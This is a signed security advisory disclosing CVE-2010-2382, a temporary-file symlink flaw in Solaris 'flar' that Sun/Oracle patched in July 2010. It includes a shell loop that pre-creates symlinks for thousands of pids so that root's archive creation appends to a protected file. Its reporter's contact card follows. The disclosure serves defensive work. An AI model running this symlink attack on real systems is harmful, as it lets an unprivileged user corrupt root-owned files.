-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Below is the full disclosure information for CVE-2010-2382. It was reported to security-alert@xxxxxxx on 23 December, 2009 and assigned Sun bug 6912851. This vulnerability was addressed by Sun/Oracle in the July 2010 Critical Patch Update (http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html). - ------ flar appears to use several hard-coded temporary paths with the process id appended such as these (possibly more--I didn't do an exhaustive search): /tmp/.flash_filter_one_.11534 /tmp/.flash_filter_two_.11534 /tmp/.flarcreate.hash.11534 As an unprivileged user, I was able to pre-create symlinks (for every likely pid) to a file I didn't have write permission to like this: $ x=0 $ while [ "$x" -le 30000 ];do > ln -s /etc/important /tmp/.flash_filter_one_.$x > x=$(expr "$x" + 1) > done Later, when root creates a flash archive with: # flar create -n junk `pwd`/junk.flar /etc/important is appended to. - ------ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTEUJoWKGA6cQSpZSAQInYAf/W9LWENhsVqmyItxRdr5brhXMoFmxfLe2 jeN8KHJQMlUofI4GImVKO7078dE2CKht7lERpx2F6euXazDy1nG6QenBeSsRo8Ga 4fqhRlKswL+yb092pVZWIuLgNd5S2aqscoFG1q9cvWeF4qXuqyxQCraoA6HumfLc WLMy3bcHsCkTS3+vT4axLO6PaoQbe1d0U0i8RPgc9s7cx4gHO04bQ/bmJnLocdKG 8aUkeQKZpc2Uws5F8goGfC3RfR9WxQMcZMzLfyM3FhxhCPxOtS0YdNPGOwGCYUTr GeRQJemYYWxlK/SLMR/1tKYFa9JHbH+Nep+DVhzcHN7+HFr2kDOQiw== =gcPO -----END PGP SIGNATURE-----
begin:vcard fn:Frank Stuart n:Stuart;Frank org:F. Stuart Consulting, LLC adr;dom:;;;Montgomery;AL email;internet:fstuart@xxxxxxxxxxx title:Owner, Senior Unix Consultant tel;cell:703-599-7777 x-mozilla-html:TRUE url:http://www.fstuart.com/ version:2.1 end:vcard
